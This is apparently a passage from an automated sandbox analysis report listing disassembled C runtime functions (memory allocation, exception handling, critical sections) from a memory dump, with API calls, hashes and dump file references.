                                                                                                            • Part of subcall function 6FDBB327: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6FDBB349
                                                                                                          • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6FE255E0,0000000C,6FDC0342,?,?,?,6FDB616E,?,6FDC5442,00000004,6FDC5D63,?,?,00000000), ref: 6FDC03DD
                                                                                                          • memcpy.MSVCR100(?,?,00000024,6FE255E0,0000000C,6FDC0342,?,?,?,6FDB616E,?,6FDC5442,00000004,6FDC5D63,?,?), ref: 6FDC03F8
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?,?,6FDC5442,00000004,6FDC5D63,?,?,00000000,?,?,?,6FDC5C6B,00000001), ref: 6FDC0422
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@Spin$??3@Once@?$_Policy@SchedulerWait@$00@details@memcpy
                                                                                                          • String ID: Uo
                                                                                                          • API String ID: 888183730-1932579714
                                                                                                          • Opcode ID: 8d4cdbefef4edc41584652f8eea857e663d1cf2de6d9b21d37ba41aac049258c
                                                                                                          • Instruction ID: 2a925d3d26f97c741736599996704af748be863d0388c94e8beceb7c9be167da
                                                                                                          • Opcode Fuzzy Hash: 8d4cdbefef4edc41584652f8eea857e663d1cf2de6d9b21d37ba41aac049258c
                                                                                                          • Instruction Fuzzy Hash: 4711A3B1A05310CFDF85DFA4CD44B6A77E5BF06349F20416AE914EB2E0EB71BA008B56
                                                                                                          Function 6FDF3F64 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6FDF3F72
                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6FDF3F79
                                                                                                            • Part of subcall function 6FDF380A: _getptd.MSVCR100(6FDF3848,00000008,6FDF38AB,?,00000000,00000003,?), ref: 6FDF3816
                                                                                                            • Part of subcall function 6FDF380A: abort.MSVCR100(6FDF3848,00000008,6FDF38AB,?,00000000,00000003,?), ref: 6FDF3838
                                                                                                          • __TypeMatch.MSVCR100(1FFFFFFF,00000000,?,6FDB2708,00000000,E06D7363,1FFFFFFF,19930522), ref: 6FDF3FAD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?terminate@@$?_inconsistency@@DecodeMatchPointerType_getptdabort
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1153117323-1018135373
                                                                                                          • Opcode ID: 12dea05cd943bb9ac6101119d5d5e1648a6ead4dd8795de1c94d38c634ece7ce
                                                                                                          • Instruction ID: 88ed2b0c781da28a9b3a9b777c4bfd0f8f44b3e09159f4187da779fd01113a0f
                                                                                                          • Opcode Fuzzy Hash: 12dea05cd943bb9ac6101119d5d5e1648a6ead4dd8795de1c94d38c634ece7ce
                                                                                                          • Instruction Fuzzy Hash: 98113975A45209AFCB40CFA8D581D8DBBB4EF04368B168296E844D7201D331F64B8B62
                                                                                                          Function 6FD841E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                          • String ID: I
                                                                                                          • API String ID: 2689964535-3707901625
                                                                                                          • Opcode ID: bc2f1c89c1078759f039ebf9d7a560c37cda189c6bed76a8749f1f0e7870672c
                                                                                                          • Instruction ID: ae2f97ed8b898b02165814c924a587c1e961028f854a78d48f1a9596e9f36891
                                                                                                          • Opcode Fuzzy Hash: bc2f1c89c1078759f039ebf9d7a560c37cda189c6bed76a8749f1f0e7870672c
                                                                                                          • Instruction Fuzzy Hash: CD018F72C0420ADBDF008FA5DC00AEE7BB5AF44728F104716E934A61D0E779A6128BA9
                                                                                                          Function 6FD90593 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                          • String ID: I
                                                                                                          • API String ID: 1371076374-3707901625
                                                                                                          • Opcode ID: 9146ea79b0e2cd0930d0f7a61baddf571fc6d02051e8e8fa25010579097adb09
                                                                                                          • Instruction ID: 0ceb626ffaca8a50fba19f0532bd727ae5d4e122da2c0e501fd8d8e2555d7f53
                                                                                                          • Opcode Fuzzy Hash: 9146ea79b0e2cd0930d0f7a61baddf571fc6d02051e8e8fa25010579097adb09
                                                                                                          • Instruction Fuzzy Hash: AC01A271C0024EEBDF109FA4D804AEE7BB5AF44728F10421AF420BA1C0DB79E6518BA4
                                                                                                          Function 6FD8C5A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000018,00000014,6FD8C631,00000000,00000000,?), ref: 6FD8C5BD
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001,00000014,6FD8C631,00000000,00000000), ref: 6FDA72C0
                                                                                                          • _CxxThrowException.MSVCR100(6FD8C631,6FD8C888,?,00000001,00000014), ref: 6FDA72D5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@ExceptionThrow_malloc_crtmalloc
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 1762725783-2104205924
                                                                                                          • Opcode ID: 96f497196f2db18067b2eaee3770f9db0234686a2efe80866e1bc7c18d2efc84
                                                                                                          • Instruction ID: 1c1c100415e85c3c3ad21bc8938f2d07ab5de790d59b2aba20ebb922c0c7b70e
                                                                                                          • Opcode Fuzzy Hash: 96f497196f2db18067b2eaee3770f9db0234686a2efe80866e1bc7c18d2efc84
                                                                                                          • Instruction Fuzzy Hash: 4E015A75540308EFDF98DFA4C856BDD7BA8EF48314F10816AE124AB2E1CBB4A6008B64
                                                                                                          Function 6FDF4027 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4035
                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4040
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF406B
                                                                                                          • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6FDF4089
                                                                                                          • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6FDF408F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?_inconsistency@@$?raw_name@type_info@@?terminate@@DecodePointerstrcmp
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2672297707-1018135373
                                                                                                          • Opcode ID: 0e10fbcdc216a47d976a5216acc1823d21fb8472fe0e0d95f87f5171ea74f30f
                                                                                                          • Instruction ID: 6dd75e5363503c926b8eb3fb8a0f59abf1fc7a8e94935156dc6d167cd5193cd9
                                                                                                          • Opcode Fuzzy Hash: 0e10fbcdc216a47d976a5216acc1823d21fb8472fe0e0d95f87f5171ea74f30f
                                                                                                          • Instruction Fuzzy Hash: F4F06236412710CB8AF0CF64E241D4AB3B9BE83765757861AD8959B310C720F943A6E3
                                                                                                          Function 6FDF6D78 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteCriticalSection.KERNEL32(0000000C,?,?,6FD97B83), ref: 6FDF6D9B
                                                                                                          • free.MSVCR100(6FE24740,?,?,6FD97B83), ref: 6FDF6DB4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                          • String ID: @Go$@Ho
                                                                                                          • API String ID: 2988086103-495180618
                                                                                                          • Opcode ID: cf2a3ffba6b8c633b9b11953682fee1e019d8170420064e1dcee964f36cbc4e8
                                                                                                          • Instruction ID: f5d6a45d0d4e71dfe937130bfcbd6d8fda51c36a53538545c2b1e48d0e52c770
                                                                                                          • Opcode Fuzzy Hash: cf2a3ffba6b8c633b9b11953682fee1e019d8170420064e1dcee964f36cbc4e8
                                                                                                          • Instruction Fuzzy Hash: 14F08276503111CBE7948B04DC44FDDB7E6AF42325F26443AE409C7191DB34B896CA50
                                                                                                          Function 6FD96E6E Relevance: 6.3, APIs: 5, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • free.MSVCR100(00000000,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96E86
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96E98
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96EAA
                                                                                                          • free.MSVCR100(6FD852B8,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96EBC
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96ECE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 32654580-0
                                                                                                          • Opcode ID: 010621ef00b1ca0f87c0612bf197140b18ff69f92ebfba9a6e93472d9c8a0ba9
                                                                                                          • Instruction ID: 33d15d37c4abba2a4d2a3353ab04f26eae17684db23659bed1ff17dd1f24b38d
                                                                                                          • Opcode Fuzzy Hash: 010621ef00b1ca0f87c0612bf197140b18ff69f92ebfba9a6e93472d9c8a0ba9
                                                                                                          • Instruction Fuzzy Hash: 35F03C32505B58DB8B84DB94E588C5B7BDABB03770352480AF428E7544DB21FCD08BE4
                                                                                                          Function 6FDFEACC Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFEAE7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFEAF2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFEB0B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFEB16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
                                                                                                          • Instruction ID: 5b5fd4c8ccc8b1e26ca97f83232ea0f4de911931a0cdcd0fc1e78eb1200c532b
                                                                                                          • Opcode Fuzzy Hash: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
                                                                                                          • Instruction Fuzzy Hash: 69A11231A05359DBCB21CF69C8809DE7BB6AF89300F16819AFC659B344D230FD52CBA1
                                                                                                          Function 6FD84A80 Relevance: 6.3, APIs: 4, Instructions: 262COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
                                                                                                          • Instruction ID: 6a2dfc00825b43136cd7daffdbd120b483dc74c6034e98c04d8c4ef9a9c78fa8
                                                                                                          • Opcode Fuzzy Hash: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
                                                                                                          • Instruction Fuzzy Hash: 7C911534A08399DBCB518F68898029E7B7DBF9B304F15815AECB49B344D770BE10CBA1
                                                                                                          Function 6FD8C046 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6FD8C0AF
                                                                                                          • GetCPInfo.KERNEL32(00000000,?), ref: 6FD8C0C2
                                                                                                          • memset.MSVCR100(0000001D,00000000,00000101), ref: 6FD8C0DA
                                                                                                          • memset.MSVCR100(0000001D,00000000,00000101,00000000,?,00000000), ref: 6FDAA8ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$CodeInfoPageValid
                                                                                                          • String ID:
                                                                                                          • API String ID: 344587817-0
                                                                                                          • Opcode ID: 45e09ea747218ff5bfa764a66f23cf4af7e784e6c637d4d3ebb75fabad6f06dd
                                                                                                          • Instruction ID: 07053dcb9eb07bc6451d47e4ef12aaee2c71f52a78b09fa9713d9e2baa7671b5
                                                                                                          • Opcode Fuzzy Hash: 45e09ea747218ff5bfa764a66f23cf4af7e784e6c637d4d3ebb75fabad6f06dd
                                                                                                          • Instruction Fuzzy Hash: 1751EE75900325DBDF908F68C8802AABBB0BF05304F15866BD895DF286D77AF542CBA1
                                                                                                          Function 6FDB6CC7 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6FDB6DA2
                                                                                                          • memset.MSVCR100(00000000,00000000,?,00000000,00000000), ref: 6FDB6DB5
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6FDB6DBC
                                                                                                          • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6FDB6E07
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3776030036-0
                                                                                                          • Opcode ID: 503ff8f14f9d8a66464284de10c66a6b769ba50e7ff6958a6161b2de73b28e35
                                                                                                          • Instruction ID: 4e55a990a837a4421f48af5b3a05717bf026d65555e61a588280d73971fc8518
                                                                                                          • Opcode Fuzzy Hash: 503ff8f14f9d8a66464284de10c66a6b769ba50e7ff6958a6161b2de73b28e35
                                                                                                          • Instruction Fuzzy Hash: D4513B70504301CFD755CF29C580B1AB7E0FF86329F108AADE5AA8B695D770F845CB92
                                                                                                          Function 6FDC0F65 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,765130B0,?,?,6FDC0F0E), ref: 6FDC0F81
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?), ref: 6FDC1062
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC106F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$??3@EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3906572401-0
                                                                                                          • Opcode ID: 6b122eee583b5377f6334fd31f6eb503c01ddb0c32113d48b000be7a875b150f
                                                                                                          • Instruction ID: 4dc1b182fca03459dd7dc52ed62c9cd173d9719380d7800a5421b2d9742dd3cf
                                                                                                          • Opcode Fuzzy Hash: 6b122eee583b5377f6334fd31f6eb503c01ddb0c32113d48b000be7a875b150f
                                                                                                          • Instruction Fuzzy Hash: 92418D75604760CFC764CF24C180A96B7F9FF4A710B1586AAD88ACF250E731F945EB62
                                                                                                          Function 6FDDC832 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDC864
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDC86F
                                                                                                          • _isctype_l.MSVCR100(?,00000008,?), ref: 6FDDC89D
                                                                                                          • _errno.MSVCR100 ref: 6FDDC921
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_isctype_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2492265471-0
                                                                                                          • Opcode ID: 2ce355f9bd71cc5f2afcd9a8b8119764e8a5e94ad5bc666c0320dbad70d4595a
                                                                                                          • Instruction ID: ad9f1d44fe9569bc86227a0b67d75db912ca9c457ca99ebb4a8ceb1cc0bb80e2
                                                                                                          • Opcode Fuzzy Hash: 2ce355f9bd71cc5f2afcd9a8b8119764e8a5e94ad5bc666c0320dbad70d4595a
                                                                                                          • Instruction Fuzzy Hash: C731D071D00309DBDB819FA8D944BD97BF4BF0A319F20019AF4A4AB290DB31F911CBA4
                                                                                                          Function 6FDC843F Relevance: 6.1, APIs: 4, Instructions: 108threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDC844F
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC8484
